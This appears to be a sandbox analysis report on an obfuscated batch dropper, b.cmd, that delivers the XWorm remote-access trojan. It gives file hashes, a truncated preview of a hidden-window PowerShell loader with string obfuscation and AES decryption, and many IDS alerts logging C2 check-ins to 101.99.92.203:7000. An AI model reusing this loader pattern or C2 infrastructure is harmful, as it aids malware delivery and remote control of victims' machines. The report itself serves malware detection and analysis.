                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with very long lines (2117), with CRLF line terminators
                Category:dropped
                Size (bytes):2119
                Entropy (8bit):5.753376599703792
                Encrypted:false
                SSDEEP:48:/7/FBLdW7HJPHR/RrRxTB//TdB/aU0QlkAk5OHX5VkFn6EvJDE6tVWM:/r5MpPHRp7TBDdBBXyOHX5VkFzRA6z
                MD5:C3128B9E9835E445C18C309D82D13595
                SHA1:A474EB8DA77489439B2F0302625BBE36E7CE99A2
                SHA-256:F9C20E6FA052BC93BE8C8084D0C65F09A0CC84160BEDD39949B3FC352D8B582B
                SHA-512:8FF9499C6EBC1351C64FF6341CEF13FDFDA593781436E7E560ADB8F049FDEA1C28C4F1452BEF5BF1BE073EFDA29D4DCF6300AB3C526D27F823FC9926B24779EC
                Malicious:false
                Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\b.cmd';$rWNT='DecpxHCopxHCmppxHCrespxHCspxHC'.Replace('pxHC', ''),'MaTGyrinTGyrMTGyroTGyrdTGyrulTGyreTGyr'.Replace('TGyr', ''),'CrYsKteYsKtateYsKtDYsKteYsKtcrYsKtypYsKttoYsKtrYsKt'.Replace('YsKt', ''),'Idnlzndnlzvdnlzokdnlzednlz'.Replace('dnlz', ''),'TraGoiknsfGoikoGoikrmFGoikinaGoiklBlGoikockGoik'.Replace('Goik', ''),'LoStkNadStkN'.Replace('StkN', ''),'FroMxWcmBaMxWcse6MxWc4StMxWcriMxWcngMxWc'.Replace('MxWc', ''),'EnrgYjtrrgYjyrgYjPorgYjinrgYjtrgYj'.Replace('rgYj', ''),'CqJGUopqJGUyqJGUTqJGUoqJGU'.Replace('qJGU', ''),'ElywTEeywTEmenywTEtAywTEtywTE'.Replace('ywTE', ''),'ReaMpXgdLMpXgineMpXgsMpXg'.Replace('MpXg', ''),'CeuHLheuHLangeuHLeExeuHLteeuHLnseuHLioneuHL'.Replace('euHL', ''),'SKlTEpliKlTEtKlTE'.Replace('KlTE', ''),'GzasmetzasmCuzasmrrzasmentzasmPrzasmocezasmszasmszasm'.Replace('zasm', '');powershell -w hidden;function OgEIm($Xyfkn){$KStrb=[System.Security.Cryptography.Aes]::Create();$KStrb.Mode=[System.Security.Cryptography.Ciphe
                File type:ASCII text, with very long lines (29358), with CRLF line terminators
                Entropy (8bit):5.995955153894766
                TrID:
                  File name:b.cmd
                  File size:66'934 bytes
                  MD5:22f8f4191985b660d43620eb8d56dc57
                  SHA1:f44ff1478083e15c97231eafc098af44f728aa02
                  SHA256:91867f295ac459c82807864841770842cd2f4b254af3f3eb36c74438dff2c8a0
                  SHA512:7d934b3c86cdb487f6c57cc3c4ccfc6153653cf15f8f9f97cf263f5cbecb157c2af575b1eae0b08e7196e9d49d54b3cb66b772346a8eea22fcc83951367bee1b
                  SSDEEP:1536:PBnkusrR0DF85ky0AAVubrIRpYuUInxRZjsC:Jkus10R8Cr6iyYRZjsC
                  TLSH:5963E0020E5DDA6A4F571725B2DB2D4F5EC8DECE894D454330588D3DF1EFA4987228E8
                  File Content Preview:start /min /b cmd /c \"set __=^&rem\..set "bXhDSGlv=sejTLcctjTLcc jTLccbkjTLcchSZjTLccA=jTLcc==1jTLcc &jTLcc& jTLccstjTLccajTLccrjTLcctjTLcc jTLcc"jTLcc"jTLcc /mjTLccinjTLcc jTLcc"..set "aUFFa0NB=&jTLcc& jTLccexijTLcctjTLcc"..set "dnp2VnFP=njTLccotjTLcc d
                  Icon Hash:9686878b929a9886
                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-10-26T08:51:31.134592+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:51:31.380832+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:51:31.606047+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:51:41.905177+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:51:41.905177+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:51:46.067340+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:51:46.077208+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:00.757563+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:00.761855+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:11.907007+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:11.907007+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:15.438912+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:15.440755+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:18.469264+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:18.473454+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:20.187649+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:20.189371+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:23.631494+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:23.633999+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:28.870044+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:28.872153+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:29.360012+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:29.368529+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:30.430971+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:30.433021+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:33.993102+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:33.997377+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:34.133769+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:34.135697+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:34.184661+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:34.192609+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:34.242315+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:34.244152+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:41.908748+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:41.908748+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:43.392634+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:43.397341+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:44.169598+02002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:44.236122+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:44.238238+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:44.361105+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:44.362969+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:44.422913+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:44.427220+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:44.491780+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:44.499829+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:44.747195+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:44.751256+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:49.733611+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:49.736759+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:50.921310+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:50.923858+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:53.999681+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:54.002242+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:54.880461+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:54.884005+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:55.053528+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:55.056128+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:52:59.966453+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:52:59.971039+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:00.028670+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:00.030487+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:00.045747+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:00.046992+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:00.076089+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:00.077688+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:00.083376+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:00.133615+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:00.163384+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:00.164856+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:03.091908+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:03.097657+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:10.278524+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:10.281806+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:11.887538+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:11.887538+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:20.601582+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:20.604015+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:25.684151+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:25.689628+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:30.913282+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:30.915218+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:31.030649+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:31.032233+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:31.147691+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:31.149558+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:31.336532+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:31.337967+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:32.476799+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:32.478538+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:33.961008+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:33.963068+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:36.616631+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:36.619425+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:36.734613+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:36.735834+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:36.854293+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:36.857389+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:41.995606+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:41.995606+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:42.503843+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:42.505494+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:42.632949+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:42.634493+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:52.741987+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:52.746689+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:52.859064+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:52.864194+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:52.943970+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:52.947376+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:52.960276+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:52.966537+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:52.976127+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:52.980186+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:53.289174+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:53.295160+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:56.390663+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:56.392838+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:53:58.676357+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:53:58.678258+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:02.665776+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:02.667429+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:07.668156+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:07.676210+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:08.507500+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:08.510187+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:08.624469+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:08.625811+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:08.753563+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:08.754877+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:11.912869+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:11.912869+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:23.336560+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:23.344229+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:24.211211+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:24.215005+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:34.462621+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:34.465448+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:34.580319+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:34.583186+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:35.258186+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:35.261598+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:35.956947+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:35.959915+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:38.992547+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:39.000265+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:41.908904+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:41.908904+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:42.164751+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:42.166457+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:44.724773+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:44.726261+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:44.843354+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:44.844727+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:49.040667+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:49.049263+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:54.882756+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
                  2024-10-26T08:54:54.885849+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732101.99.92.2037000TCP
                  2024-10-26T08:54:54.999825+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1101.99.92.2037000192.168.2.449732TCP
